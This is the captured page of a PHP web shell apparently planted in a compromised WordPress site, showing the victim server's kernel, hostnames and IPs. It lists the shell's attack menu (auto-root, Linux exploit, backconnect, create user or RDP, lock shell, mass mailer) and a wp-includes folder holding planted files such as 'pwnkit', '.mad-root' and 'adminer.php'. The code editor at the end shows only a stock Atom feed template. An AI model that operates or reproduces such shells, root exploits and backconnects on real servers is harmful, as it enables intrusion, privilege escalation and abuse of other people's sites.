Linux webd123.cluster006.gra.hosting.ovh.net 5.15.162-ovh-vps-grsec-zfs-classid #1 SMP Mon Jul 15 08:28:44 UTC 2024 x86_64
Apache
: 10.6.40.122 | : 216.73.216.128
Cant Read [ /etc/named.conf ]
5.4.45
zouerate
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
zouerate /
ZOUERATE.COM /
leranch /
wp-includes /
[ HOME SHELL ]
Name
Size
Permission
Action
Text
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
atomlib.php
10.67
KB
-rwxr--r--
author-template.php
13.84
KB
-rwxr--r--
bookmark-template.php
8.74
KB
-rwxr--r--
bookmark.php
10.44
KB
-rwxr--r--
cache.php
11.59
KB
-rwxr--r--
canonical.php
9.52
KB
-rwxr--r--
capabilities.php
12.43
KB
-rwxr--r--
category-template.php
16.1
KB
-rwxr--r--
category.php
11.08
KB
-rwxr--r--
class-IXR.php
27.47
KB
-rwxr--r--
class-phpass.php
6.65
KB
-rwxr--r--
class-phpmailer.php
43.94
KB
-rwxr--r--
class-pop3.php
20.18
KB
-rwxr--r--
class-smtp.php
32.64
KB
-rwxr--r--
class-snoopy.php
37
KB
-rwxr--r--
class.wp-dependencies.php
5.35
KB
-rwxr--r--
class.wp-scripts.php
2.61
KB
-rwxr--r--
class.wp-styles.php
2.31
KB
-rwxr--r--
classes.php
24.26
KB
-rwxr--r--
comment-template.php
23.33
KB
-rwxr--r--
comment.php
43.31
KB
-rwxr--r--
compat.php
2.63
KB
-rwxr--r--
cron.php
5.06
KB
-rwxr--r--
default-filters.php
6.73
KB
-rwxr--r--
deprecated.php
36.67
KB
-rwxr--r--
feed-atom-comments.php
3.38
KB
-rwxr--r--
feed-atom.php
2.37
KB
-rwxr--r--
feed-rdf.php
2.04
KB
-rwxr--r--
feed-rss.php
1.23
KB
-rwxr--r--
feed-rss2-comments.php
2.45
KB
-rwxr--r--
feed-rss2.php
2.05
KB
-rwxr--r--
feed.php
14.09
KB
-rwxr--r--
formatting.php
45.39
KB
-rwxr--r--
functions.php
71.02
KB
-rwxr--r--
functions.wp-scripts.php
1.98
KB
-rwxr--r--
functions.wp-styles.php
1.11
KB
-rwxr--r--
general-template.php
39.06
KB
-rwxr--r--
gettext.php
11.11
KB
-rwxr--r--
kses.php
30.24
KB
-rwxr--r--
l10n.php
9.8
KB
-rwxr--r--
link-template.php
25.37
KB
-rwxr--r--
locale.php
9.31
KB
-rwxr--r--
media.php
17.32
KB
-rwxr--r--
pluggable.php
51.25
KB
-rwxr--r--
plugin.php
21.06
KB
-rwxr--r--
post-template.php
20.22
KB
-rwxr--r--
post.php
95.43
KB
-rwxr--r--
pwnkit
10.99
KB
-rwxr-xr-x
query.php
49.11
KB
-rwxr--r--
registration-functions.php
200
B
-rwxr--r--
registration.php
8.66
KB
-rwxr--r--
rewrite.php
33.22
KB
-rwxr--r--
rss-functions.php
183
B
-rwxr--r--
rss.php
21.02
KB
-rwxr--r--
script-loader.php
14.37
KB
-rwxr--r--
shortcodes.php
7.37
KB
-rwxr--r--
streams.php
4.33
KB
-rwxr--r--
taxonomy.php
67.66
KB
-rwxr--r--
template-loader.php
2.13
KB
-rwxr--r--
theme.php
18.91
KB
-rwxr--r--
update.php
5.61
KB
-rwxr--r--
user.php
9.88
KB
-rwxr--r--
vars.php
2.47
KB
-rwxr--r--
version.php
374
B
-rwxr--r--
widgets.php
55
KB
-rwxr--r--
wlwmanifest.xml
1013
B
-rwxr--r--
wp-db.php
23.78
KB
-rwxr--r--
wp-diff.php
9.93
KB
-rwxr--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : feed-atom.php
<?php /** * Atom Feed Template for displaying Atom Posts feed. * * @package WordPress */ header('Content-Type: application/atom+xml; charset=' . get_option('blog_charset'), true); $more = 1; ?> <?php echo '<?xml version="1.0" encoding="'.get_option('blog_charset').'"?'.'>'; ?> <feed xmlns="http://www.w3.org/2005/Atom" xmlns:thr="http://purl.org/syndication/thread/1.0" xml:lang="<?php echo get_option('rss_language'); ?>" xml:base="<?php bloginfo_rss('home') ?>/wp-atom.php" <?php do_action('atom_ns'); ?> > <title type="text"><?php bloginfo_rss('name'); wp_title_rss(); ?></title> <subtitle type="text"><?php bloginfo_rss("description") ?></subtitle> <updated><?php echo mysql2date('Y-m-d\TH:i:s\Z', get_lastpostmodified('GMT')); ?></updated> <?php the_generator( 'atom' ); ?> <link rel="alternate" type="text/html" href="<?php bloginfo_rss('home') ?>" /> <id><?php bloginfo('atom_url'); ?></id> <link rel="self" type="application/atom+xml" href="<?php self_link(); ?>" /> <?php do_action('atom_head'); ?> <?php while (have_posts()) : the_post(); ?> <entry> <author> <name><?php the_author() ?></name> <?php $author_url = get_the_author_url(); if ( !empty($author_url) ) : ?> <uri><?php the_author_url()?></uri> <?php endif; ?> </author> <title type="<?php html_type_rss(); ?>"><![CDATA[<?php the_title_rss() ?>]]></title> <link rel="alternate" type="text/html" href="<?php the_permalink_rss() ?>" /> <id><?php the_guid(); ?></id> <updated><?php echo get_post_modified_time('Y-m-d\TH:i:s\Z', true); ?></updated> <published><?php echo get_post_time('Y-m-d\TH:i:s\Z', true); ?></published> <?php the_category_rss('atom') ?> <summary type="<?php html_type_rss(); ?>"><![CDATA[<?php the_excerpt_rss(); ?>]]></summary> <?php if ( !get_option('rss_use_excerpt') ) : ?> <content type="<?php html_type_rss(); ?>" xml:base="<?php the_permalink_rss() ?>"><![CDATA[<?php the_content('', 0, '') ?>]]></content> <?php endif; ?> <?php atom_enclosure(); ?> <?php do_action('atom_entry'); ?> <link rel="replies" type="text/html" href="<?php the_permalink_rss() ?>#comments" thr:count="<?php echo get_comments_number()?>"/> <link rel="replies" type="application/atom+xml" href="<?php echo get_post_comments_feed_link(0,'atom') ?>" thr:count="<?php echo get_comments_number()?>"/> <thr:total><?php echo get_comments_number()?></thr:total> </entry> <?php endwhile ; ?> </feed>
Close